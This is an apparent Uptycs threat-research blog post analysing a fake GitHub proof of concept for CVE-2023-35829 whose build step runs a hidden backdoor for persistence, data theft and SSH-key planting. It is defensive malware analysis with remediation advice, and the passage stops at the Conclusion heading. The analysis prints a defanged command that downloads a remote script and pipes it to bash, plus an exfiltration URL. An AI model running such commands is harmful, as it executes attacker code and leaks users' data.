  </div>
</header></div>
       

      

      <main id="main-content" class="body-container-wrapper">
        

<div class="body-container body-container--blog-post blog-post-new blog-post-new-design"> 

  <div id="hs_cos_wrapper_blog-article-header" class="hs_cos_wrapper hs_cos_wrapper_widget hs_cos_wrapper_type_module" style="" data-hs-cos-general-type="widget" data-hs-cos-type="module"><div class="blog-poster-header blog-article-header">
  <div class="content-outer">
    <div class="top-one">
      <div class="blog-box_inner">
        <div class="blog-box-content">
          <div class="banner-left">
            <div class="post_header">
              <h1><a href="https://www.uptycs.com/blog/threat-research-report-team/new-poc-exploit-backdoor-malware">PoC Exploit: Fake Proof of Concept with Backdoor Malware</a></h1>
            </div>
            <div class="bottom-sec">
              <div class="blog-post__meta">
                <time class="blog-post__timestamp">
                  July 12, 2023
                </time>
              </div>
              <div class="tag-and-social">
                <div class="post-tags">
                  
                  
                  <a href="https://www.uptycs.com/blog/threat-research-report-team/tag/threats"><span class="tag">Threats</span></a>
                  
                  
                </div>
              </div>
            </div>
            <div class="author-looping">
              <div class="author_section">
                
                <div class="author_image">
                  
                  <img class="blog-author-avatar" src="https://www.uptycs.com/hs-fs/hubfs/Logo-Shield_Padded_400x400.png?width=200&amp;name=Logo-Shield_Padded_400x400.png" alt="Uptycs Threat Research" width="200" loading="eager" srcset="https://www.uptycs.com/hs-fs/hubfs/Logo-Shield_Padded_400x400.png?width=100&amp;name=Logo-Shield_Padded_400x400.png 100w, https://www.uptycs.com/hs-fs/hubfs/Logo-Shield_Padded_400x400.png?width=200&amp;name=Logo-Shield_Padded_400x400.png 200w, https://www.uptycs.com/hs-fs/hubfs/Logo-Shield_Padded_400x400.png?width=300&amp;name=Logo-Shield_Padded_400x400.png 300w, https://www.uptycs.com/hs-fs/hubfs/Logo-Shield_Padded_400x400.png?width=400&amp;name=Logo-Shield_Padded_400x400.png 400w, https://www.uptycs.com/hs-fs/hubfs/Logo-Shield_Padded_400x400.png?width=500&amp;name=Logo-Shield_Padded_400x400.png 500w, https://www.uptycs.com/hs-fs/hubfs/Logo-Shield_Padded_400x400.png?width=600&amp;name=Logo-Shield_Padded_400x400.png 600w" sizes="(max-width: 200px) 100vw, 200px">
                  
                </div>
                <div class="author_bio">
                  <div class="written">
                    <p>
                      Uptycs Threat Research
                    </p>
                  </div>
                </div>
                
              </div>
              
            </div>
          </div>

          <div class="banner-right">
            <div class="featured-image">
              
              <img src="https://www.uptycs.com/hubfs/POC%20door.jpg" alt="PoC Exploit: Fake Proof of Concept with Backdoor Malware">
              
            </div>
          </div>

        </div>


      </div>
    </div>

    
     
  </div>
</div>


</div> 


   
  <div class="blogPostBottomArea">
    <div class="wrapper">
      <div class="blogPostAreaRow d_flex space_between align_start"> 
        
        <div class="content-wrapper blog--post-content-section">
          <article class="blog-post">
            
            <div class="blog-post__tags">
              Tags
              
              <a class="blog-post__tag-link" href="https://www.uptycs.com/blog/threat-research-report-team/tag/threats" rel="tag">Threats</a>
              
            </div>
             
            <div class="blog-post__body">
              <span id="hs_cos_wrapper_post_body" class="hs_cos_wrapper hs_cos_wrapper_meta_field hs_cos_wrapper_type_rich_text" style="" data-hs-cos-general-type="meta_field" data-hs-cos-type="rich_text"><p style="font-weight: normal;"><span style="font-weight: bold;">Threat Researchers:</span> <span style="color: #cafa3c;">Nischay Hegde</span> and <span style="color: #cafa3c;">Siddartha Malladi</span></p>
<!--more-->
<p>&nbsp;</p>
<p>A deceptive twist has appeared within cybersecurity norms—a proof of concept (PoC) that, rather than demonstrating a vulnerability, stealthily harbors a hidden backdoor. Recently discovered by the Uptycs threat research team, this fake PoC particularly impacts the security research community.</p>
<p>&nbsp;</p>
<p>As their primary users, security researchers rely on PoCs to understand potential vulnerabilities by way of innocuous testing. In this instance, the PoC is a wolf in sheep's clothing, harboring malicious intent under the guise of a harmless learning tool. Its concealed backdoor presents a stealthy, persistent threat. Operating as a downloader, it silently dumps and executes a Linux bash script, all the while disguising its operations as a kernel-level process.</p>
<p>&nbsp;</p>
<p>Its persistence methodology is quite crafty. It leverages the <span style="font-size: 16px; font-family: 'Courier New', Courier, monospace;">make</span> command, which is normally used to build executables from source code files, to create a <span style="font-size: 16px; font-family: 'Courier New', Courier, monospace;">kworker</span> file and adds its file path to the <span style="font-size: 16px; font-family: 'Courier New', Courier, monospace;">bashrc</span> file, thus enabling the malware to continually operate within a victim's system.</p>
<p>&nbsp;</p>
<p>The backdoor has broad data theft capabilities. It can exfiltrate a wide array of data—from the hostname and username to an exhaustive list of home directory contents. Moreover, an attacker can gain full access to a target system by adding their ssh key to the <span style="font-size: 16px; font-family: 'Courier New', Courier, monospace;">authorized_keys</span> file.</p>
<p>&nbsp;</p>
<p>Despite its removal from GitHub, this malicious PoC has been widely shared, achieving significant engagement before its nefarious nature was exposed. For those who have executed it, the likelihood of data compromise is high. Therefore it’s crucial to:</p>
<p>&nbsp;</p>
<ul style="font-size: 16px;">
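<li aria-level="1">remove any unauthorized ssh keys from the <span style="font-family: 'Courier New', Courier, monospace;">authorized_keys</span> file</li>
<li aria-level="1">delete the <span style="font-family: 'Courier New', Courier, monospace;">kworker</span> file (<span style="font-family: 'Courier New', Courier, monospace;">$HOME/.local/kworker</span>)</li>
<li aria-level="1">remove the kworker path from the <span style="font-family: 'Courier New', Courier, monospace;">bashrc</span> file (<span style="font-family: 'Courier New', Courier, monospace;">$HOME/.bashrc</span>)</li>
<li aria-level="1">check <span style="font-family: 'Courier New', Courier, monospace;">/tmp/.iCE-unix.pid</span> for potential threats (the technical analysis below spells this path <span style="font-family: 'Courier New', Courier, monospace;">/tmp/.ICE-unix.pid</span>; Linux paths are case-sensitive, so check both spellings)</li>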
</ul>
<p>While it can be challenging to distinguish legitimate PoCs from deceptive ones, adopting safe practices such as testing in isolated environments (e.g., virtual machines) can provide a layer of protection.</p>
<p>Although not entirely new, this trend of spreading malware through PoCs poses a significant concern, and it's likely we’ll see this tactic continue to evolve. The Uptycs threat research team remains vigilant in uncovering such threats, thereby helping the security research community to stay abreast of evolving cybersecurity risks.</p>
<p>&nbsp;</p>
<h2>Unveiling the Fake PoC</h2>
<p>While testing PoCs of various CVEs, our team encountered <span>one</span> claiming to address CVE-2023-35829 (a critical vulnerability); Uptycs XDR detected its unusual activity. Significant irregularities suggested it might be deceptive in nature, prompting us to question its legitimacy.</p>
<p>&nbsp;</p>
<p>Suspicious activity included unexpected network connections, unusual data transfers, and unauthorized system access attempts. Further investigation singled out <span style="font-family: 'Courier New', Courier, monospace;">aclocal.m4</span> as the initial file requiring additional analysis.</p>
<p>&nbsp;</p>
<p style="text-align: center;"><img src="https://www.uptycs.com/hs-fs/hubfs/Figure%201-4.png?width=769&amp;height=534&amp;name=Figure%201-4.png" alt="Figure 1 - PoC repository files" width="769" height="534" loading="lazy" style="height: auto; max-width: 100%; width: 769px; margin-left: auto; margin-right: auto; display: block;" srcset="https://www.uptycs.com/hs-fs/hubfs/Figure%201-4.png?width=385&amp;height=267&amp;name=Figure%201-4.png 385w, https://www.uptycs.com/hs-fs/hubfs/Figure%201-4.png?width=769&amp;height=534&amp;name=Figure%201-4.png 769w, https://www.uptycs.com/hs-fs/hubfs/Figure%201-4.png?width=1154&amp;height=801&amp;name=Figure%201-4.png 1154w, https://www.uptycs.com/hs-fs/hubfs/Figure%201-4.png?width=1538&amp;height=1068&amp;name=Figure%201-4.png 1538w, https://www.uptycs.com/hs-fs/hubfs/Figure%201-4.png?width=1923&amp;height=1335&amp;name=Figure%201-4.png 1923w, https://www.uptycs.com/hs-fs/hubfs/Figure%201-4.png?width=2307&amp;height=1602&amp;name=Figure%201-4.png 2307w" sizes="(max-width: 769px) 100vw, 769px"><span style="font-size: 14px;"><em>Figure 1 – PoC repository files</em></span></p>
<p>&nbsp;</p>
<p><span style="font-family: 'Courier New', Courier, monospace;">aclocal.m4</span> is normally part of <span style="font-family: 'Courier New', Courier, monospace;">automake</span>, used by <span style="font-family: 'Courier New', Courier, monospace;">autoconf</span> to consolidate macros. It is usually not an <span style="font-family: 'Courier New', Courier, monospace;">ELF</span> (Executable and Linkable Format) file, as it is here.</p>
<p>&nbsp;</p>
<p>Figure 2 shows how <span style="font-family: 'Courier New', Courier, monospace;">make</span> triggers <span style="font-family: 'Courier New', Courier, monospace;">src/aclocal.m4</span>, which is the focus of this article.</p>
<p>&nbsp;</p>
<p style="text-align: center;"><img src="https://www.uptycs.com/hs-fs/hubfs/Figure%202-3.png?width=624&amp;height=552&amp;name=Figure%202-3.png" alt="Figure 2 - The offending makefile" width="624" height="552" loading="lazy" style="height: auto; max-width: 100%; width: 624px; margin-left: auto; margin-right: auto; display: block;" srcset="https://www.uptycs.com/hs-fs/hubfs/Figure%202-3.png?width=312&amp;height=276&amp;name=Figure%202-3.png 312w, https://www.uptycs.com/hs-fs/hubfs/Figure%202-3.png?width=624&amp;height=552&amp;name=Figure%202-3.png 624w, https://www.uptycs.com/hs-fs/hubfs/Figure%202-3.png?width=936&amp;height=828&amp;name=Figure%202-3.png 936w, https://www.uptycs.com/hs-fs/hubfs/Figure%202-3.png?width=1248&amp;height=1104&amp;name=Figure%202-3.png 1248w, https://www.uptycs.com/hs-fs/hubfs/Figure%202-3.png?width=1560&amp;height=1380&amp;name=Figure%202-3.png 1560w, https://www.uptycs.com/hs-fs/hubfs/Figure%202-3.png?width=1872&amp;height=1656&amp;name=Figure%202-3.png 1872w" sizes="(max-width: 624px) 100vw, 624px"><em><span style="font-size: 14px;">Figure 2 – The offending makefile</span></em></p>
<p>&nbsp;</p>
<h2>Technical Analysis</h2>
<p>The binary’s main function begins with an interesting string—<span style="font-family: 'Courier New', Courier, monospace;">kworker</span> (figure 3).</p>
<p>&nbsp;</p>
<p style="text-align: center;"><img src="https://www.uptycs.com/hs-fs/hubfs/Figure%203-2.png?width=767&amp;height=714&amp;name=Figure%203-2.png" alt="Figure 3 - The start of the binary" width="767" height="714" loading="lazy" style="height: auto; max-width: 100%; width: 767px; margin-left: auto; margin-right: auto; display: block;" srcset="https://www.uptycs.com/hs-fs/hubfs/Figure%203-2.png?width=384&amp;height=357&amp;name=Figure%203-2.png 384w, https://www.uptycs.com/hs-fs/hubfs/Figure%203-2.png?width=767&amp;height=714&amp;name=Figure%203-2.png 767w, https://www.uptycs.com/hs-fs/hubfs/Figure%203-2.png?width=1151&amp;height=1071&amp;name=Figure%203-2.png 1151w, https://www.uptycs.com/hs-fs/hubfs/Figure%203-2.png?width=1534&amp;height=1428&amp;name=Figure%203-2.png 1534w, https://www.uptycs.com/hs-fs/hubfs/Figure%203-2.png?width=1918&amp;height=1785&amp;name=Figure%203-2.png 1918w, https://www.uptycs.com/hs-fs/hubfs/Figure%203-2.png?width=2301&amp;height=2142&amp;name=Figure%203-2.png 2301w" sizes="(max-width: 767px) 100vw, 767px"><span style="font-size: 14px;"><em>Figure 3 – The start of the binary</em></span></p>
<p>&nbsp;</p>
<p>Line 79 checks if the binary is named <span style="font-family: 'Courier New', Courier, monospace;">kworker</span>. If true, flow passes to the <span style="font-family: 'Courier New', Courier, monospace;">else</span> condition in line 84. If not, two functions, <span style="font-family: 'Courier New', Courier, monospace;">copy_to_kworker()</span> and <span style="font-family: 'Courier New', Courier, monospace;">add_to_bashrc()</span>, are executed. To establish backdoor persistence, these copy the current file to <span style="font-family: 'Courier New', Courier, monospace;">$HOME/.local/kworker</span> and add its file path to the <span style="font-family: 'Courier New', Courier, monospace;">$HOME/.bashrc</span> file.&nbsp;<br><br>To conceal its presence, the program embeds itself in <span style="font-family: 'Courier New', Courier, monospace;">bashrc</span>. The <span style="font-family: 'Courier New', Courier, monospace;">check_for_pidfile()</span> function (figure 4) helps ensure that multiple instances of the same program aren’t running simultaneously.&nbsp;</p>
<p>&nbsp;</p>
<p><img src="https://www.uptycs.com/hs-fs/hubfs/Figure%204-2.png?width=767&amp;height=712&amp;name=Figure%204-2.png" alt="Figure 4 - Check_for_pidfile() function" width="767" height="712" loading="lazy" style="height: auto; max-width: 100%; width: 767px; margin-left: auto; margin-right: auto; display: block;" srcset="https://www.uptycs.com/hs-fs/hubfs/Figure%204-2.png?width=384&amp;height=356&amp;name=Figure%204-2.png 384w, https://www.uptycs.com/hs-fs/hubfs/Figure%204-2.png?width=767&amp;height=712&amp;name=Figure%204-2.png 767w, https://www.uptycs.com/hs-fs/hubfs/Figure%204-2.png?width=1151&amp;height=1068&amp;name=Figure%204-2.png 1151w, https://www.uptycs.com/hs-fs/hubfs/Figure%204-2.png?width=1534&amp;height=1424&amp;name=Figure%204-2.png 1534w, https://www.uptycs.com/hs-fs/hubfs/Figure%204-2.png?width=1918&amp;height=1780&amp;name=Figure%204-2.png 1918w, https://www.uptycs.com/hs-fs/hubfs/Figure%204-2.png?width=2301&amp;height=2136&amp;name=Figure%204-2.png 2301w" sizes="(max-width: 767px) 100vw, 767px"></p>
<p style="font-size: 14px; text-align: center;"><em>Figure 4 – Check_for_pidfile() function</em></p>
<p>&nbsp;</p>
<p>After checking the <span style="font-family: 'Courier New', Courier, monospace;">/tmp/.ICE-unix.pid</span> path, it writes the PID of the currently running process if the file is not already locked with <span style="font-family: 'Courier New', Courier, monospace;">flock(2)</span>. The program proceeds only if the main function returns zero (<span style="font-family: 'Courier New', Courier, monospace;">0</span>), indicating the current process is exclusive.&nbsp;</p>
<p>&nbsp;</p>
<p><img src="https://www.uptycs.com/hs-fs/hubfs/Figure%205-2.png?width=770&amp;height=711&amp;name=Figure%205-2.png" alt="Figure 5 - Main function else portion" width="770" height="711" loading="lazy" style="height: auto; max-width: 100%; width: 770px; margin-left: auto; margin-right: auto; display: block;" srcset="https://www.uptycs.com/hs-fs/hubfs/Figure%205-2.png?width=385&amp;height=356&amp;name=Figure%205-2.png 385w, https://www.uptycs.com/hs-fs/hubfs/Figure%205-2.png?width=770&amp;height=711&amp;name=Figure%205-2.png 770w, https://www.uptycs.com/hs-fs/hubfs/Figure%205-2.png?width=1155&amp;height=1067&amp;name=Figure%205-2.png 1155w, https://www.uptycs.com/hs-fs/hubfs/Figure%205-2.png?width=1540&amp;height=1422&amp;name=Figure%205-2.png 1540w, https://www.uptycs.com/hs-fs/hubfs/Figure%205-2.png?width=1925&amp;height=1778&amp;name=Figure%205-2.png 1925w, https://www.uptycs.com/hs-fs/hubfs/Figure%205-2.png?width=2310&amp;height=2133&amp;name=Figure%205-2.png 2310w" sizes="(max-width: 770px) 100vw, 770px"></p>
<p style="font-size: 14px; text-align: center;"><em>Figure 5 – Main function <span style="font-family: 'Courier New', Courier, monospace;">else</span> portion</em></p>
<p>&nbsp;</p>
<p>In the main function, the program forks and a new string, <span style="font-family: 'Courier New', Courier, monospace;">[kworker/8:3]</span>, is created to obscure the original command line parameters. Subsequently, the parent process executes the <span style="font-family: 'Courier New', Courier, monospace;">curl_func()</span> function, which uses the libcurl library to download a URL that is obfuscated so that basic static analysis can’t easily find it. The URL is <span style="font-family: 'Courier New', Courier, monospace;">hxxp[:]//cunniloss[.]accesscam[.]org/hash[.]php</span>; it contains a bash script that is run if the curl request succeeds.&nbsp;<br><br>(<span style="font-family: 'Courier New', Courier, monospace;">libcurl</span> provides programmatic access to <span style="font-family: 'Courier New', Courier, monospace;">curl</span>; it can be directly included in a binary {statically compiled} or called dynamically.)</p>
<p>&nbsp;</p>
<p style="text-align: center;"><img src="https://www.uptycs.com/hs-fs/hubfs/Figure%206-1.png?width=757&amp;height=461&amp;name=Figure%206-1.png" alt="Figure 6 - Excerpt from curl_func()" width="757" height="461" loading="lazy" style="height: auto; max-width: 100%; width: 757px; margin-left: auto; margin-right: auto; display: block;" srcset="https://www.uptycs.com/hs-fs/hubfs/Figure%206-1.png?width=379&amp;height=231&amp;name=Figure%206-1.png 379w, https://www.uptycs.com/hs-fs/hubfs/Figure%206-1.png?width=757&amp;height=461&amp;name=Figure%206-1.png 757w, https://www.uptycs.com/hs-fs/hubfs/Figure%206-1.png?width=1136&amp;height=692&amp;name=Figure%206-1.png 1136w, https://www.uptycs.com/hs-fs/hubfs/Figure%206-1.png?width=1514&amp;height=922&amp;name=Figure%206-1.png 1514w, https://www.uptycs.com/hs-fs/hubfs/Figure%206-1.png?width=1893&amp;height=1153&amp;name=Figure%206-1.png 1893w, https://www.uptycs.com/hs-fs/hubfs/Figure%206-1.png?width=2271&amp;height=1383&amp;name=Figure%206-1.png 2271w" sizes="(max-width: 757px) 100vw, 757px"><em><span style="font-size: 14px;">Figure 6 – Excerpt from curl_func()</span></em></p>
<p>&nbsp;</p>
<p>&nbsp;</p>
<p style="text-align: center;"><img src="https://www.uptycs.com/hs-fs/hubfs/Figure%207-1.png?width=764&amp;height=826&amp;name=Figure%207-1.png" alt="Figure 7 - Code portion that downloads the bash script" width="764" height="826" loading="lazy" style="height: auto; max-width: 100%; width: 764px; margin-left: auto; margin-right: auto; display: block;" srcset="https://www.uptycs.com/hs-fs/hubfs/Figure%207-1.png?width=382&amp;height=413&amp;name=Figure%207-1.png 382w, https://www.uptycs.com/hs-fs/hubfs/Figure%207-1.png?width=764&amp;height=826&amp;name=Figure%207-1.png 764w, https://www.uptycs.com/hs-fs/hubfs/Figure%207-1.png?width=1146&amp;height=1239&amp;name=Figure%207-1.png 1146w, https://www.uptycs.com/hs-fs/hubfs/Figure%207-1.png?width=1528&amp;height=1652&amp;name=Figure%207-1.png 1528w, https://www.uptycs.com/hs-fs/hubfs/Figure%207-1.png?width=1910&amp;height=2065&amp;name=Figure%207-1.png 1910w, https://www.uptycs.com/hs-fs/hubfs/Figure%207-1.png?width=2292&amp;height=2478&amp;name=Figure%207-1.png 2292w" sizes="(max-width: 764px) 100vw, 764px"><em><span style="font-size: 14px;">Figure 7 – Code portion that downloads the bash script</span></em></p>
<p>&nbsp;</p>
<p>The <span style="font-family: 'Courier New', Courier, monospace;">%s</span> placeholder is replaced by the curl request output, which implies that the following is the command run by kworker:</p>
<p style="padding-left: 40px;"><br><span style="font-family: 'Courier New', Courier, monospace;">sh -c wget -q -O - http[:]//cunniloss[.]accesscam[.]org/do[.]php?u=$(whoami) | bash 2&gt;&amp;1 &gt; /dev/null</span></p>
<p>&nbsp;</p>
<h2>Deconstructing the Bogus PoC</h2>
<p>This PoC is copied from an old, legitimate <a href="https://github.com/randorisec/CVE-2022-34918-LPE-PoC" rel="noopener" target="_blank">PoC</a> of a Linux kernel vulnerability, CVE-2022-34918. On the surface, it appears to be an authentic demonstration, complete with strings that mimic genuine output. But the true nature of this deception becomes apparent upon closer examination of its code—particularly the discrepancies found within <span style="font-family: 'Courier New', Courier, monospace;">modprobe.c</span>.<br><br>A <span style="font-family: 'Courier New', Courier, monospace;">new_sn()</span> function in the fake <span style="font-family: 'Courier New', Courier, monospace;">modprobe.c</span> allocates memory, attempts to open a specific file, closes the file if it was successfully opened, generates a random number, then pauses program execution for a random duration.</p>
<p>&nbsp;</p>
<p style="text-align: center;"><img src="https://www.uptycs.com/hs-fs/hubfs/Figure%208-1.png?width=1910&amp;height=889&amp;name=Figure%208-1.png" alt="Figure 8 - Comparison of modprobe.c between the PoCs" width="1910" height="889" loading="lazy" style="height: auto; max-width: 100%; width: 1910px; margin-left: auto; margin-right: auto; display: block;" srcset="https://www.uptycs.com/hs-fs/hubfs/Figure%208-1.png?width=955&amp;height=445&amp;name=Figure%208-1.png 955w, https://www.uptycs.com/hs-fs/hubfs/Figure%208-1.png?width=1910&amp;height=889&amp;name=Figure%208-1.png 1910w, https://www.uptycs.com/hs-fs/hubfs/Figure%208-1.png?width=2865&amp;height=1334&amp;name=Figure%208-1.png 2865w, https://www.uptycs.com/hs-fs/hubfs/Figure%208-1.png?width=3820&amp;height=1778&amp;name=Figure%208-1.png 3820w, https://www.uptycs.com/hs-fs/hubfs/Figure%208-1.png?width=4775&amp;height=2223&amp;name=Figure%208-1.png 4775w, https://www.uptycs.com/hs-fs/hubfs/Figure%208-1.png?width=5730&amp;height=2667&amp;name=Figure%208-1.png 5730w" sizes="(max-width: 1910px) 100vw, 1910px"><span style="font-size: 14px;"><em>Figure 8 – Comparison of modprobe.c between the PoCs</em></span></p>
<p>&nbsp;</p>
<p>A <span style="font-family: 'Courier New', Courier, monospace;">prepare_root_shell()</span> function prints some strings and, depending on a condition, calls the <span style="font-family: 'Courier New', Courier, monospace;">setup_modprobe_payoad()</span> function. It exits with a status code of <span style="font-family: 'Courier New', Courier, monospace;">0</span> after completing these operations.</p>
<p>&nbsp;</p>
<p style="text-align: center;"><img src="https://www.uptycs.com/hs-fs/hubfs/Figure%209-1.png?width=1920&amp;height=889&amp;name=Figure%209-1.png" alt="Figure 9 - Code portion that prints legitimate looking strings" width="1920" height="889" loading="lazy" style="height: auto; max-width: 100%; width: 1920px; margin-left: auto; margin-right: auto; display: block;" srcset="https://www.uptycs.com/hs-fs/hubfs/Figure%209-1.png?width=960&amp;height=445&amp;name=Figure%209-1.png 960w, https://www.uptycs.com/hs-fs/hubfs/Figure%209-1.png?width=1920&amp;height=889&amp;name=Figure%209-1.png 1920w, https://www.uptycs.com/hs-fs/hubfs/Figure%209-1.png?width=2880&amp;height=1334&amp;name=Figure%209-1.png 2880w, https://www.uptycs.com/hs-fs/hubfs/Figure%209-1.png?width=3840&amp;height=1778&amp;name=Figure%209-1.png 3840w, https://www.uptycs.com/hs-fs/hubfs/Figure%209-1.png?width=4800&amp;height=2223&amp;name=Figure%209-1.png 4800w, https://www.uptycs.com/hs-fs/hubfs/Figure%209-1.png?width=5760&amp;height=2667&amp;name=Figure%209-1.png 5760w" sizes="(max-width: 1920px) 100vw, 1920px"><span style="font-size: 14px;">Figure 9 – Code portion that prints legitimate looking strings</span></p>
<p>&nbsp;</p>
<p>The aforementioned <span style="font-family: 'Courier New', Courier, monospace;">setup_modprobe_payoad()</span> assigns a value to the <span style="font-family: 'Courier New', Courier, monospace;">filename</span> variable, then executes a <span style="font-family: 'Courier New', Courier, monospace;">/bin/sh</span> command to open a new system shell. It then frees the memory allocated to <span style="font-family: 'Courier New', Courier, monospace;">filename</span>.</p>
<p>&nbsp;</p>
<p style="text-align: center;"><img src="https://www.uptycs.com/hs-fs/hubfs/Figure%2010-1.png?width=1920&amp;height=883&amp;name=Figure%2010-1.png" alt="Figure 10 - Code segment that shows it is faking the shell" width="1920" height="883" loading="lazy" style="height: auto; max-width: 100%; width: 1920px; margin-left: auto; margin-right: auto; display: block;" srcset="https://www.uptycs.com/hs-fs/hubfs/Figure%2010-1.png?width=960&amp;height=442&amp;name=Figure%2010-1.png 960w, https://www.uptycs.com/hs-fs/hubfs/Figure%2010-1.png?width=1920&amp;height=883&amp;name=Figure%2010-1.png 1920w, https://www.uptycs.com/hs-fs/hubfs/Figure%2010-1.png?width=2880&amp;height=1325&amp;name=Figure%2010-1.png 2880w, https://www.uptycs.com/hs-fs/hubfs/Figure%2010-1.png?width=3840&amp;height=1766&amp;name=Figure%2010-1.png 3840w, https://www.uptycs.com/hs-fs/hubfs/Figure%2010-1.png?width=4800&amp;height=2208&amp;name=Figure%2010-1.png 4800w, https://www.uptycs.com/hs-fs/hubfs/Figure%2010-1.png?width=5760&amp;height=2649&amp;name=Figure%2010-1.png 5760w" sizes="(max-width: 1920px) 100vw, 1920px"><em><span style="font-size: 14px;">Figure 10 – Code segment that shows it is faking the shell</span></em></p>
<p>&nbsp;</p>
<p>In its entirety, the bogus PoC sleeps for a random duration, prints legitimate-looking strings, and ultimately launches a <span style="font-family: 'Courier New', Courier, monospace;">/bin/bash</span> shell.<br><br>Curiously, when executing <span style="font-family: 'Courier New', Courier, monospace;">whoami</span> within this shell, it falsely reports the user ID as <span style="font-family: 'Courier New', Courier, monospace;">root</span>. This deception is accomplished by exploiting the difference in the user namespace ID inside and outside the PoC root shell.</p>
<p>&nbsp;</p>
<p style="text-align: center;"><img src="https://www.uptycs.com/hs-fs/hubfs/Figure%2011-1.png?width=792&amp;height=581&amp;name=Figure%2011-1.png" alt="Figure 11 - Listing namespaces inside PoC root shell" width="792" height="581" loading="lazy" style="height: auto; max-width: 100%; width: 792px; margin-left: auto; margin-right: auto; display: block;" srcset="https://www.uptycs.com/hs-fs/hubfs/Figure%2011-1.png?width=396&amp;height=291&amp;name=Figure%2011-1.png 396w, https://www.uptycs.com/hs-fs/hubfs/Figure%2011-1.png?width=792&amp;height=581&amp;name=Figure%2011-1.png 792w, https://www.uptycs.com/hs-fs/hubfs/Figure%2011-1.png?width=1188&amp;height=872&amp;name=Figure%2011-1.png 1188w, https://www.uptycs.com/hs-fs/hubfs/Figure%2011-1.png?width=1584&amp;height=1162&amp;name=Figure%2011-1.png 1584w, https://www.uptycs.com/hs-fs/hubfs/Figure%2011-1.png?width=1980&amp;height=1453&amp;name=Figure%2011-1.png 1980w, https://www.uptycs.com/hs-fs/hubfs/Figure%2011-1.png?width=2376&amp;height=1743&amp;name=Figure%2011-1.png 2376w" sizes="(max-width: 792px) 100vw, 792px"><em><span style="font-size: 14px;">Figure 11 – Listing namespaces inside PoC root shell</span></em></p>
<p>&nbsp;</p>
<p style="text-align: center;"><img src="https://www.uptycs.com/hs-fs/hubfs/Figure%2012-3.png?width=813&amp;height=256&amp;name=Figure%2012-3.png" alt="Figure 12 - Listing namespaces outside PoC root shell" width="813" height="256" loading="lazy" style="height: auto; max-width: 100%; width: 813px; margin-left: auto; margin-right: auto; display: block;" srcset="https://www.uptycs.com/hs-fs/hubfs/Figure%2012-3.png?width=407&amp;height=128&amp;name=Figure%2012-3.png 407w, https://www.uptycs.com/hs-fs/hubfs/Figure%2012-3.png?width=813&amp;height=256&amp;name=Figure%2012-3.png 813w, https://www.uptycs.com/hs-fs/hubfs/Figure%2012-3.png?width=1220&amp;height=384&amp;name=Figure%2012-3.png 1220w, https://www.uptycs.com/hs-fs/hubfs/Figure%2012-3.png?width=1626&amp;height=512&amp;name=Figure%2012-3.png 1626w, https://www.uptycs.com/hs-fs/hubfs/Figure%2012-3.png?width=2033&amp;height=640&amp;name=Figure%2012-3.png 2033w, https://www.uptycs.com/hs-fs/hubfs/Figure%2012-3.png?width=2439&amp;height=768&amp;name=Figure%2012-3.png 2439w" sizes="(max-width: 813px) 100vw, 813px"><em><span style="font-size: 14px;">Figure 12 – Listing namespaces outside PoC root shell</span></em></p>
<p>&nbsp;</p>
<p>As seen in figures 11 and 12, the <span style="font-family: 'Courier New', Courier, monospace;">user</span> namespace differs between the two shells, which means they are running in two distinct namespaces.<br><br>(Linux kernel namespaces permit isolation of system resources. Each provides an independent environment for specific resources (e.g., PIDs, network interfaces, file systems, etc.). Such isolation helps prevent interference and provides a level of security between processes or components running on the system.)<br><br>Here, the phony PoC takes advantage of the namespace concept to create the illusion of a root shell. Specifically, it manipulates the user namespace, which is responsible for managing user and group identities within a given process or container. In reality, the granted privileges are limited to the <span style="font-family: 'Courier New', Courier, monospace;">/bin/bash</span> shell inside that namespace and do not extend to the host. When a PoC hands back a "root" shell, a quick sanity check is to compare the user namespace inside and outside it, as in figures 11 and 12 (for example with <span style="font-family: 'Courier New', Courier, monospace;">lsns</span>, or by reading <span style="font-family: 'Courier New', Courier, monospace;">/proc/self/uid_map</span> to see how the IDs are mapped).</p>
<p>&nbsp;</p>
<h2>Detection through Uptycs XDR</h2>
<p>Using Uptycs XDR, we detected that the binary primarily acts as a downloader, retrieving a script from a remote source and executing it on the compromised system. Upon execution, the downloaded script first accesses the <span style="font-family: 'Courier New', Courier, monospace;">/etc/passwd</span> file. It then modifies <span style="font-family: 'Courier New', Courier, monospace;">~/.ssh/authorized_keys</span> to grant unauthorized access and uses <span style="font-family: 'Courier New', Courier, monospace;">curl</span> to exfiltrate data via <span style="font-family: 'Courier New', Courier, monospace;">transfer[.]sh</span>. Correlated against the MITRE ATT&amp;CK matrix, the combination of these actions raised a medium-level detection in Uptycs XDR.</p>
<p>&nbsp;</p>
<p style="text-align: center;"><img src="https://www.uptycs.com/hs-fs/hubfs/Figure%2013-1.png?width=1854&amp;height=853&amp;name=Figure%2013-1.png" alt="Figure 13 – Uptycs XDR detection" width="1854" height="853" loading="lazy" style="height: auto; max-width: 100%; width: 1854px; margin-left: auto; margin-right: auto; display: block;" srcset="https://www.uptycs.com/hs-fs/hubfs/Figure%2013-1.png?width=927&amp;height=427&amp;name=Figure%2013-1.png 927w, https://www.uptycs.com/hs-fs/hubfs/Figure%2013-1.png?width=1854&amp;height=853&amp;name=Figure%2013-1.png 1854w, https://www.uptycs.com/hs-fs/hubfs/Figure%2013-1.png?width=2781&amp;height=1280&amp;name=Figure%2013-1.png 2781w, https://www.uptycs.com/hs-fs/hubfs/Figure%2013-1.png?width=3708&amp;height=1706&amp;name=Figure%2013-1.png 3708w, https://www.uptycs.com/hs-fs/hubfs/Figure%2013-1.png?width=4635&amp;height=2133&amp;name=Figure%2013-1.png 4635w, https://www.uptycs.com/hs-fs/hubfs/Figure%2013-1.png?width=5562&amp;height=2559&amp;name=Figure%2013-1.png 5562w" sizes="(max-width: 1854px) 100vw, 1854px"><em><span style="font-size: 14px;">Figure 13 – Uptycs XDR detection</span></em></p>
<p>&nbsp;</p>
<p>The following is an example of a URL used to exfiltrate data:<br><br></p>
<p style="padding-left: 40px;"><span style="font-family: 'Courier New', Courier, monospace;">hxxp[:]//cunniloss[.]accesscam[.]org/term[.]php[?]term[=]hxxps[:]//transfer[.]sh/rnmWbQyyz8/&lt;username&gt;[.]txt</span></p>
<p>&nbsp;</p>
<p>(Note: The domain that hosts the script has been taken down, so a detailed analysis cannot be done in this article.)</p>
<p>&nbsp;</p>
<h2>Conclusion</h2>
